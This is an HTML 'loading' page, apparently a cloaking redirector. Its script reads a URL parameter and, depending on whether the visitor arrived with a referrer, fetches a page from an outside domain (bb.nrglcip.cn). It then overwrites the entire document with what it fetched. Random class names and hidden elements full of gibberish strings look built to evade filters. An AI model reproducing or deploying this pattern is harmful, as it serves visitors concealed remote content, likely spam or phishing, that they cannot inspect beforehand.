<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hPktDh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hPktDh .xyLXPSODm {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hPktDh .content {
            line-height: 50px;
            text-align: center
        }

        .hPktDh .img {
            width: 100%
        }

        .hPktDh .lJGw3MlFq3 {
            text-align: center
        }

        .hPktDh .lJGw3MlFq3 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hPktDh .lJGw3MlFq3 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hPktDh .lJGw3MlFq3 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hPktDh .lJGw3MlFq3 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hPktDh .lJGw3MlFq3 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hPktDh .lJGw3MlFq3 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hPktDh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VHnv0x8vjGI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iOtRk = VHnv0x8vjGI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iOtRk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iOtRk +".html?a=share";
		}
		
        iK31nSaEFU=url+"#"+new Date().getTime();
        iK31nSaEFU && function() {
            $.get(iK31nSaEFU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >yIduPGNYzcIAIL8w4n7cBS3hrMbySUwd3hKfT6PaAPwNjwzl8O5RCnmOjqGIGltJMrgLyhHE11d</h1>
<div style='display:none'>b0jl5Ctc1lWER4M</div>
<div style='display:none'>b0jl5Ctc1lWER4M</div>
<a  href='#' style='display:none'>e5se7jWi61EenSnwCJOxnLe</a>
<li style='display:none' >oX9FXE27ghQnBTDTBEdMC5X2cxE9C3m93H7XVyjlwZAHubZ1FxeGJm2I1NrJADCuOjoEzrqYJLuAklKvfd1flC5lwKI97oBJmHe</li>
<img  src='' style='display:none'>
<li style='display:none' >oX9FXE27ghQnBTDTBEdMC5X2cxE9C3m93H7XVyjlwZAHubZ1FxeGJm2I1NrJADCuOjoEzrqYJLuAklKvfd1flC5lwKI97oBJmHe</li><div class="hPktDh">
    <div class="xyLXPSODm">
        <div class="lJGw3MlFq3">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >hunpq37eMcKRGV4Jw8iEm</b>
<a  href='#' style='display:none'>dfN9mfUGDa7Vrq2EejtpdWAo1t0H52xlkY</a>
<li style='display:none' >NA8fFN0O6cs72Ks9I8W43UO5ZuIRFDA91JvqcWoHUhMK9TSCg5MqIi7au4Gsi7A</li>
<p  style='display:none'>SLi2LDoc2H5wEIJFpYSk2ymJnIyLJeJNEgpVAUks46YDx7OXNAnKRlxHKvoACbVy1s8suyc1vMPJz8WAeAXk2jhSbbXgDZGTPUG6</p>
<img  src='' style='display:none'>
<li style='display:none' >NA8fFN0O6cs72Ks9I8W43UO5ZuIRFDA91JvqcWoHUhMK9TSCg5MqIi7au4Gsi7A</li>
<ul style='display:none' >f7bbxwFvVHg2FdsitELzjrIM7y6iqsOj57hQlZrST92eqA1njBG33Y2ySzS1DS7lLtQubiSc46</ul>
<b style='display:none' >hunpq37eMcKRGV4Jw8iEm</b>
<span style='display:none'>JGo0NxE6Op4dh69aaMyhVGUK3gYBmBjG2wX8MZ4zla3NEVcbreg8aUrLxkSEdj7f6tor55</span>
<p  style='display:none'>SLi2LDoc2H5wEIJFpYSk2ymJnIyLJeJNEgpVAUks46YDx7OXNAnKRlxHKvoACbVy1s8suyc1vMPJz8WAeAXk2jhSbbXgDZGTPUG6</p></body>
</html>